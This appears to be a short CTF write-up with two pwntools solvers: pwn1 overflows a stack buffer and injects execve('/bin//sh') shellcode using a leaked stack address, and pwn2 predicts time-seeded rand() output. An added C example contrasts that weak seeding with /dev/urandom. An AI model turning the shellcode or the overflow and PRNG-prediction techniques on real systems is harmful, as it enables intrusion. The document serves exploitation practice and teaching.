Breather problems
pwn1.
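```python
from pwn import *

s = process("./pwn1")
elf = ELF("./pwn1")

# Read the 14-character hex value the binary prints first (used below as a stack address).
stack = int(s.recv(14), 16)
# 22-byte x86-64 execve("/bin//sh") shellcode
shell = b"\x31\xF6\x56\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x54\x5F\xF7\xEE\xB0\x3B\x0F\x05"
print("stack : " + hex(stack))
gdb.attach(s, 'b *0x4005A3')  # debugging aid: breakpoint inside the target

pay = b"A" * (0x10 + 8)    # padding up to the saved return address
pay += p64(stack + 0x20)   # new return address: the bytes right after this pointer, if the leak is the buffer start
pay += shell               # shellcode placed directly after the return address
s.sendline(pay)
s.interactive()
```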
pwn2.
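```python
from math import *
from pwn import *
from ctypes import *
import time

s = remote("127.0.0.1", 1123)
elf = ELF("./third")
libc = CDLL("libc.so.6")

# Seed the local libc rand() with the current time
v3 = libc.time(0)
print(v3)
libc.srand(v3)

# Send 35 values, each the low 4 bits of the next rand() output
for i in range(0, 35):
    v7 = libc.rand() & 0xf
    print(str(v7))
    s.sendline(str(v7).encode())
s.interactive()
```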
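The pwn2 solver above only works if the service derives its 35 values from `rand()` seeded with the current time. As an added example (not from the original post; the weak pattern is inferred from the solver rather than taken from the target's source, and the function names are hypothetical), this C program shows that such values are a pure function of the seed, next to a form that draws them from the kernel CSPRNG instead:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#define ROUNDS 35 /* same round count as the solver loop */

/* Weak pattern (assumed from the solver): clock-derived seed, low 4 bits of rand(). */
void weak_rounds(unsigned seed, unsigned char out[ROUNDS]) {
    srand(seed);
    for (int i = 0; i < ROUNDS; i++)
        out[i] = (unsigned char)(rand() & 0xf);
}

/* Hardened form: take the bytes from the kernel CSPRNG. Returns 0 on success. */
int strong_rounds(unsigned char out[ROUNDS]) {
    FILE *f = fopen("/dev/urandom", "rb");
    if (!f)
        return -1;
    size_t got = fread(out, 1, ROUNDS, f);
    fclose(f);
    if (got != ROUNDS)
        return -1; /* fail closed rather than fall back to rand() */
    for (int i = 0; i < ROUNDS; i++)
        out[i] &= 0xf;
    return 0;
}

/* Returns 1 when a second party that knows only the seed reproduces every round. */
int seed_reproduces(unsigned seed) {
    unsigned char service[ROUNDS], observer[ROUNDS];
    weak_rounds(seed, service);
    weak_rounds(seed, observer);
    return memcmp(service, observer, ROUNDS) == 0;
}

int main(void) {
    unsigned now = (unsigned)time(NULL); /* one-second granularity: trivially guessable */
    unsigned char r[ROUNDS];
    printf("time-seeded rounds reproducible from the seed: %d\n", seed_reproduces(now));
    if (strong_rounds(r) != 0) {
        fprintf(stderr, "could not read /dev/urandom\n");
        return 1;
    }
    printf("first CSPRNG round value: %d\n", r[0]);
    return 0;
}
```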